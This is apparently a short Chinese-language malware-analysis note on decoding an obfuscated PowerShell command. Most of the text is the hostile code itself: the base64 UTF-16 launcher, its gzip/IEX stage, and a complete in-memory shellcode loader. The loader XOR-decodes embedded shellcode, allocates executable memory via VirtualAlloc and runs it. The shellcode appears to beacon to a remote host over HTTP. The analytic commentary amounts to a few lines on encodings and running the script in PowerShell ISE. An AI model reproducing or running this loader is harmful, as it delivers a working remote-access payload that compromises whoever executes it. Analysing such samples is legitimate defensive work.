PowerShell解密

原始

JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFkAKwBpAHkAaABMACsAUABQADQASwBQAGsAeQBpAFIAcwBkAEYAOABXADMAMgBaAEoATQBWAEIASQBFAEIAUgBvAFQAeABiAGMANQBrAHcAawB1AGoAYQBQAFAAZQBpAEgAaAAyAC8ALwB0AHAAVQBPAGYATQBuAHAAMgA5AGQANQBOADcAVABZAGgATgBkADEAVgAxADEAVgBOAFAAVgB4AGMAYQBRAEgAYwBhAGkAbAAwAEwAeQBZAEUATgBpAEwAcwA1AGkAQgBNADMAOABJAGwATwBwAFgASQA3AEQAZwBSAEUAZgBDAEcAKwBWAGkAdABPADYAbAB1AG8AbQBDADQARwByAHgAdQBBAFgAcwBNADQAcwBGADQATgAyADQANQBCAGsAaABCAC8AVgBXADYAbQBSAG0AeAA0AFIATwAzADIAWQBNAFMAdgBYAG0AQwBuAEUARABTAEoAOABxAFUAUQBCAEgAWQBhAGcALwByAE4AVABlAFcAbQBuAEUAcgA5AHgASABEAEEAcQAyADgAZwA5AHcAQgBlAFAAWQBDADIAZwBaADMAZwBqAFcAcgBQAG8AegBBAGMAQgA1ADcAaAArAGkAKwBmAFAAegBOAHAASABBAE0AZgBuAGQAOQBiAEUANABCAEcAUwBRAEkAOABFADcAbwBnAHEAZABXAEoAYgA4AFIAaQBDADIASgB3ADkAMgBqAHUAZwBJAFcASQB2ADQAagBiADEAOQBZAEUAQgBxAFkAQgBMADIASQA1AFkAMQBoAGIASABOAEQASQB0ADQAcwAxAEsAYgBDAE0ASQBvAEsAVwBGAGsASQBYADEAYQBwAC8ALwBsAG0AdABQADkAKwAxAFgAMQBwAHMAbABCAG8AdwBxAFYAVwAxAFAARQBIAEEAYQA5AGsAUQBWAHUAdgBFADkAMwBxAHgAbwBaADYASABvAEYAYQBWAFgAUwBzAE8AawBzAEIAQgByAFkAWAByAFUANQAzAFcAVQArAG0AOQBVAGoAbwB2AG4AMwAyAHYAMQBpACsAUgBiAFUASQBEAHgALwBIAHIASQBBAHUAcgBaADUAMQBhAEYAUQArAG4ARwBKAHYAUgBHAGMATgBxAGsAMwBnAHUAOQBuAHQAKwBlAFMARwArAHYAbgBrAHoAUwAzADMAawBlAHEAQQBsACsAQQBqAEUAUQBhAGkAQgArAE8AQgBhAEkARwBuAHgAaABtADkARABNAEEATQBPAFYAcQBzAG0ATwBIADMAKwBwAGwAcgBIAFQAcwBRAEEAcABiAEYAUABYAEgAMwBCAGUAbwBkAGcARAAyAHEAMwBmAGcAcABoAEUAOQB0ADkALwBsADIANwBMAHoAVQBGAFoARgBkAHcAZgAxAGUAcAA5AGwANABKAFMAMAAxAFIAWABHADkAZQBPAFAARQA3AGMATQBnAGwAYgA4ADcAbQBjAEQAZwAvAGUAZgArAE8AWABIAFgAOAArADQAbABnADkAYwByADMAeQBnAGQAVQB0AFEARQBFAEcAdwBPAEIAVgA0AFQAeABmAGMAZgBWAHkAcwAzAE4AYwB6AGsARQBPAEoANwBhAE4ARQBqAGMAVQB1ADgATABRAFQAWQBKAEcAVAB0AGgAbwBDAEQATwBpADMAVABxAGMAUQByAHEATAAvAC8AawA1ADcAegB0AFYAVABOAHAALwB0AEoAUQArADYAcAAxADAAVABtAG4ANQArAHoASABGACsASgA1AEgAcgBqADIAUwArAFcAbQBYAHIAbQB3AHAANQBoAC8ATgBWAE0AWAAyAGkAQQB1ADEAbgA5ADkARwBzAGIAQQBjAFgAMAB3AHoAbgAzAEQAYwA2ADAAcgA0AFcAcwBmADUAUQB3ADQARQBKAFIANAB0AEsANQBpAEMAdgBhAHoAVgByADAAcwBBAEgAdAA4AFEAYQBkAGEAQQBQAHIAOABzAHgAcgByAHUAZQBoAE4AbAB6ADQANwBOADcASgB3ADMAaABQAHMARgBhAFoARQAvAFUAZABuAHoAagBtAHMAVgBRAFYAZgBCAGgANwBHADcALwB5AE8AYQBYAHIAcgA0AEcATQBHAHIAdABLAFgAbwA1AFYAZgBkAHkALwBlAEMAeQA0AHoAMABFAGkAUwBKAGoARgBOADgAVABtADMAbQBvAFEARwBEAEEAagBzAEoAagBIAHkARQAvAGUAeQBOAEUAcABSAFUAQQA2AHIALwA3AGcAcgBwAHgAQwA1AGwAcABHAGcAcQA3AG0AWAArAGcAZQBRAFgAcgBaAG0AQQBoACsAZgBtAE4AVABDADIAYwBVAHcANgBGAG8ASQBMAE4AZQBBAEIAUwBwAE4AZwBuAGQAdABRAE8AZQBhAHUANwBtADYAVQBQADAAUQBFADgAYQBBAEUAQgA4ADUAYgBPAG0AQQBjADQASgBuAEMAaQB3ADAAVgBIAEEAbQB0AHAAdgAvADUAawBlADkAcABRAEUAawBlAEMARQBFAEgAcABZAHUAcQB4AEEASABqAFEAMgB1AE8AWgBjAFQAVgBkAEwATgAyAEEAQwA3ACsAaAAvAGMAdgBwADYAVAA4ADYARQBvAHMATABxAEMAOQBNADUAcABUAEEAQQBOAEIAcQBoAEoAegBOADAAWQA0AGIAcABXAGIAZgA1AEUAdgBQAC8ATgB2AFIAOQBMAHoAQQA5AHUATQBqAEcANABKAEwASgBXAEgAcwBSAG4ATwBrAGYARgBjAFMAawBsAHIAZQBKAHkAKwBmAEsARwBaAFkAbABjAGoARABCAHEAWABCAHgANAB0AEoARwBBAGYAbABjAHIAeQAxAGkAdABTAGcAMwBUAFMATQBqAGwAbgBkAHEAUABKACsAeQBCADQAeQBPAGUAMQBmAEYAegB3AEEAOABWAGMAYQB3AGsAaQBiAE8AUQBuAGsAawBXAG0AegA1AE8AZQBWAEoAMABCAEgAVQA0ADcAcQBaAFoASwBxAFEANgBUAFYASQBjAGkAZQBWAE8AMABZAFIAMQBoAE0ATgBqAHMARwBxAG4AWAByAGQAdABoADgASgBCAHcAWABQAEoASQBPAEsAVABzAFgAQQBZAGoALwBoAE8ARgBIAEQAOQBqAFgAdAAvAHMAWABQAFcAVgA4ADIAcwBiAFMANABGAGIAbQBCAE8AdQBDADQALwBUADcAaABDAG4AaABjAE8ATgBCAGMAeAA5AHcARQBlAGYAeABJAE8AVABDAEIAaQB2AFcARQAvADkATwBuAE0ANwBnAEoAVwA3AEkATwBsAFoARwBVAFUARwBnAEoAagBjADgAdwBmADUAZwAyAE4AYgBFAC8AbQB1AFMATABOADIAVgBEAFIAZgBGAHMAeQAyAHkAbwBuAEsAcQBjAE8AaQA0ADYAawB6AGMAOQBJAG0AMAAzAFcAOQBqAHgAaQBxAGEAbgA1AEUATwBJADQAQgBXAHEAagA5AFgAMAB4ADEAegBRADYAdAAvAGIAcABTAG4ARABsAG4AYwBVAHIAawB2ADAAUQBEAFgAdgAyAHEAWgBOAHoAUwBoAGYAagBjAE4AUgB5AGUAYgB2AHEAMgAwAGQAcgB5AFcAWABXAFUAcABGAHkAZgBxAFYATQBzAE4AMABvAFgAVwB5ADYAdgBLAHgAUgAyAEwAWgBtAEgAegBQADcASwBYAGsAVQBkAGIAUwBpAHAAbwBiAFgAegBYAE8ALwB5AHcAZwA3ADQAUwBoAFoASQBaAG8AdgB4AFgANQBzADUARQB3AG8AdQBjAEMAawBIAFYAVABvAGkAdABKADYASQA5ADYAegA2AE8AeQBmAHAAcwAxAHkARwA5AHUARwB2AEQANQArAHcATABaADkAUgBwAFoAeABMAG8AdwBlAEIANQA2AHcAegBFAFAAaQBZAGwAdgBEAE8AQwBwADgAegBQAHMANwBpADEASQB5AFcAUwBmAEQAKwBXAHoAVABFADIAWQB3AGsATgBYADkAVwBoADAALwBRAFYAWABvAEoAdABOADcAMQBKAHYAdQBJAHkAMAA0AGsAZQBOADcAZABqADAARgA2AGkAVABkAHEAcwBkADEAMQB0AFAATQB0AG0ANwB1AHQAdQBiAFEASQA5ADEASQA5AG0ARwBRAE4AaQBKAGUAVAB6ADYAWgBzAEEAOQA3ADMAVwAxAEcAaABVAE8ANQA3AFEALwA3AFMAVQBjAFAAdQBlAFgASwB0ADMAeABlAGEAdQB1AGkAMABCAEYASABLAHIAdgBXADUAOABmADkAbQBGAEUAegBVAFgATABoAFIAbQBmAGIAeQBtAHgAUABMADcAWAA5AFUAWgBtAG8AeQBrAGcAbgBqACsAcgBNADcAWQBZAHIAVgBoAHgAcAA1AE8AcAB4AHgAUgA2AFYAZQBaAHUAVABkAGEAeQBqAFAAMgBXAFAANgBuAGsAKwBmAFYAaQB1ADEAUgBsAGsASAAxAGYANwAyAFUAUwBmAFcAKwBzAFIAUgBVAHMANgBTAHcAdAB6AFYAcwBTAHgASwBGAEEAbgBSAFYAWABMAHUANgBGAEEAVQB2AGUAbgBiAE4ARgBUAEgANwBuAFYAegBCAHcAMwBRAHMAZABQAFIAbAB1AEoAagBmAGoAdABnADcAWgBzAGcARQBsADQAYwBMAHkAKwBrAHYAcQBNADEAYgBzAFAAKwB1ADIAQgBuAGYAWQBUAGkAQwBqAEIAeQBSAGIAbQBSAEgAbABzADYAQQBmADUARgBNAHoAVwBrADUAbgBTAFcANABmAFIAZABCAEwASgB1AGgASwAyAHQANABzAEYAVwBvAGUAcABwAGkALwBVADQANwA2AGQAbQAvAFMAOQB3AEwARgBpAFIAeABtAGsAVAByAHgAMgBzAHIAMwBWAE8AOAA2ADYAdQA1AEUAZQA3AG0AeABlADkAYgBQAE8ANgBkADcAUABNAG4ATQBOAGEAWQAzAHAAcABlAEcAQQA4AGYAUwBuAFIALwByAFQAYQBSADgANwB2AGYAVwBRAC8ATABRAFkAZQB3ADEAKwB0AEYAaABZAFkAegBZAGYAcQBTAGIAYQBEAHkAUgBwAFQAYwAzAEgAbQAzAFkAdgAzAFAAYwBtAEQAUwBaAHAAZQBJADAAdABuAEgAUABpAFgAcABJAEcASwA4AEYAeQA5AHMANQBpAG0AbwBxAFIANwBOAGgAeQB1AEsATQBXAEQAaAB6AFEAdwBzAGoAZQBIAEEALwA3AFIAQwBQAEgAQwAyAHMAZwBDAHIAUwA1AGoATQBhAE0AdwB2AE8AOQBlAEMAQQB3ADYANwA2ADgAbgBGAEwAWgBlAFAATwBKAFMAVgAwACsAbwA5AHAAUwAxAEcAZgBYAEEAbwBOADUAVAB2AFkATQAyAHMAWQA4ADEAUgBhAEsASgBKAHcAdwBuADgAbABrAEoAMwBUAGsAbgBjADIAaQB3AFoAWQBhAFQAegBBAFAATQB3AC8AegBCAGYAUABJAGIAZgBoAGkARgBpAFcAWQBwADcAawA4AEYAbgBLAGwANABPAG8AUgBHAFQARgBkAGMAcgBYAHQAdwBJAGgAUgAzAGUANgBEAHUAWgBzAG4ANgAwAEYAWABUAGgAOABvAGQATABKAFkATwBsAEEAbQBXAHgAVQAvAGkAYwBLADUAOABwAEcAagA1AG0AWgBSAGkAWgB3AGcAeAByADMARgBzAGIAaQB2AC8AeQBEAHcALwB4ADEARQB4AEYAdQB0AHcAUgBVAEcARgA2ADkAaQB2AHQARwBvAEYAMwBmACsAMgA4AHIAegA3AGYASABsADIAcQBPADkAdgBkACsAWgBSADIAeQBOADYAaABWADEAcQAxAHcANQBHAE8AKwBxADEAYQA4AGEASAA5AG0ASQBrADYAMABCAGMAUgBYAEQAegBjAHYAMQA2AHUARwBDAG0ATAB1ADAASQBOAFAAQQBMAFQAUgBxAHQAWQArADcANQBqADIASQBmAFEAQgB4AFIANABsADcAegBtAHYAQgBIAGsARQBZAFcARQBYAFQAOQBJAHYAdQBCAGIAZAB3ADUAOABiAHEAQgBWADkATQBUADMAaABJAGQAVAA0AGMAMQBZAGsAMwBRAGQAdwBwAG4AVwBNAHkAVQA4AGMAcABHADQAdABMAGgATgBmACsANgBpAHIANAArAGYATQBhAGgAOQBkADgAQgA2AEkARQAvAEEAMwBhAE4AZwBuAHkAUwBKAEUAawBXAGYAeAAzAHkAWAByAGwAOQAyAEYAaABnAGoAQwB2AHYAWgBsAHIARgBvADMAVgBPADAALwBlADcAdwBUAEwAbgBlAG8AWAA5AE8AUABVADkAOABEAC8ATQBRAEUALwBiAFAAcgBmAG8AUwAzAEEASwAzAHUAegBOACsAaABLAGgAegA3AEcAcQAxADYAcABmAHEAMQBVAEIASQBkADQATgA1ACsANABKAC8AegBsAEEAUwBKAGkAVwBIAEkAdgB3AFIAUgBIAGQANwB2AEEAeABKADgAcAA1AGIAMQBiAHUAegBYAHEAaABNAEEAdQBpAFYAdQBEACsARQA3AGMANABmAEIARwBDAGQAWABCADMAeQByAHgASgBpADAAdQBZAGUATAA4ADYAZgBXAE4AeQBBAHoAMwByAFAAaQBOAG0AQQBFAEwANABOAGIANQBUAGcAeABNAHoARgBLAEEAZQA2AG4AQwBkAEcAbQBrAEUATQBaAHoAZgB3AFAAeQArAE4AWABCAHkAdwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

base64解密

$s=New-Object IOMemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IOStreamReader(New-Object IOCompressionGzipStream($s,[IOCompressionCompressionMode]::Decompress)))ReadToEnd();

H4sIAAAAAAAAA开头一般是bash+gzip

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMT0pVRg5IRloMQkZQDUlQI4sP9t5PkqSoz0D9EZPeQGuhQxZw5Sb1Tbjhb8m0iqMnlou+qHTs/bl6l54hw3p8M1n86s2TpFXYncnHL1TJI2JAQEZTVxkDCQwJLilgTE1NRkBXSkxNGQNAT0xQRi4pYEJAS0YOYExNV1FMTxkDTUwOQEJAS0YuKXZQRlEOYkRGTVcZA3BLTEBIVEJVRgNlT0JQSy4pI039zwW5QOFYRbD+pfnsAhLEqHhKSX+eGpvfm6NunCc59o617du6slt3IfwWbGNO+TvMzoRZGRN5ZpqPGqMTNp1hWWtZpuSTWQxk1ybB9IFEJ2N7ufrZfwkc5xR4jATpjdHQnw2z9nwwbZlBSC5up7CmTUOB/zkrf5Z80/WDm+HAWWcDEyAQbtk7LLZ3VDg15pk5G+Cs+m+hlVFJkLL7YIcfkfWPuJqMfdMpj3Wfl7BIAdgxvksS0DWc7JIBbXqDCNHH5r7ICZ6MXP3wDg/CuiHw31Lq6EZICyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEBoNGhQNGhsNFiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

在PowerShell ISE执行脚本

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMT0pVRg5IRloMQkZQDUlQI4sP9t5PkqSoz0D9EZPeQGuhQxZw5Sb1Tbjhb8m0iqMnlou+qHTs/bl6l54hw3p8M1n86s2TpFXYncnHL1TJI2JAQEZTVxkDCQwJLilgTE1NRkBXSkxNGQNAT0xQRi4pYEJAS0YOYExNV1FMTxkDTUwOQEJAS0YuKXZQRlEOYkRGTVcZA3BLTEBIVEJVRgNlT0JQSy4pI039zwW5QOFYRbD+pfnsAhLEqHhKSX+eGpvfm6NunCc59o617du6slt3IfwWbGNO+TvMzoRZGRN5ZpqPGqMTNp1hWWtZpuSTWQxk1ybB9IFEJ2N7ufrZfwkc5xR4jATpjdHQnw2z9nwwbZlBSC5up7CmTUOB/zkrf5Z80/WDm+HAWWcDEyAQbtk7LLZ3VDg15pk5G+Cs+m+hlVFJkLL7YIcfkfWPuJqMfdMpj3Wfl7BIAdgxvksS0DWc7JIBbXqDCNHH5r7ICZ6MXP3wDg/CuiHw31Lq6EZICyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEBoNGhQNGhsNFiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

然后写个脚本转换为字符串

使用十六进制编辑器打开，文件开头为FF FE，代表文件为UTF-16(LE)编码

windows默认的是UTF-8，所以先用Notepad++改一下编码

附件列表